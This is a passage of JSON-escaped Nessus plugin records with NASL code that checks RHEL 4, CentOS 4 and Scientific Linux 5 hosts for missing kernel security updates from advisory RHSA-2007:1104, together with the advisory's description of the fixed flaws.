cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:59", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel 
are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. 
This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-12-24T00:00:00", "id": "REDHAT-RHSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29774", "title": "RHEL 4 : kernel (RHSA-2007:1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1104. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29774);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"RHEL 4 : kernel (RHSA-2007:1104)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. 
In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. 
This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-5494\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:1104\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:1104\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", 
reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:07:58", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). 
(CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.", "modified": "2018-11-10T00:00:00", "published": "2007-12-24T00:00:00", "id": "CENTOS_RHSA-2007-1104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=29751", "title": "CentOS 4 : kernel (CESA-2007:1104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:1104 and \n# CentOS Errata and Security Advisory 2007:1104 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29751);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(26337);\n script_xref(name:\"RHSA\", value:\"2007:1104\");\n\n script_name(english:\"CentOS 4 : 
kernel (CESA-2007:1104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and several\nbugs in the Red Hat Enterprise Linux 4 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\nA flaw was found in the handling of IEEE 802.11 frames, which affected\nseveral wireless LAN modules. In certain situations, a remote attacker\ncould trigger this flaw by sending a malicious packet over a wireless\nnetwork, causing a denial of service (kernel crash). (CVE-2007-4997,\nImportant)\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nAdditionally, the following bugs were fixed :\n\n* when running the 'ls -la' command on an NFSv4 mount point, incorrect\nfile attributes, and outdated file size and timestamp information were\nreturned. As well, symbolic links may have been displayed as actual\nfiles.\n\n* a bug which caused the cmirror write path to appear deadlocked after\na successful recovery, which may have caused syncing to hang, has been\nresolved.\n\n* a kernel panic which occurred when manually configuring LCS\ninterfaces on the IBM S/390 has been resolved.\n\n* when running a 32-bit binary on a 64-bit system, it was possible to\nmmap page at address 0 without flag MAP_FIXED set. 
This has been\nresolved in these updated packages.\n\n* the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\ninterrupt counter in '/proc/interrupts' on systems running an AMD\nOpteron CPU. This caused systems running NMI Watchdog to restart at\nregular intervals.\n\n* a bug which caused the diskdump utility to run very slowly on\ndevices using Fusion MPT has been resolved.\n\nAll users are advised to upgrade to these updated packages, which\nresolve these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3ea55ac\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cbae523f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-December/014551.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0eecf7d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"kernel-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", 
reference:\"kernel-doc-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:10", "bulletinFamily": "scanner", "description": "These new kernel packages contain fixes for the following security\nissues :\n\nA 
memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.", "modified": "2019-01-07T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20071129_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60318", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60318);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/01/07 9:52:18\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These new kernel packages contain fixes for the following 
security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0712&L=scientific-linux-errata&T=0&P=197\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f76d5a8f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 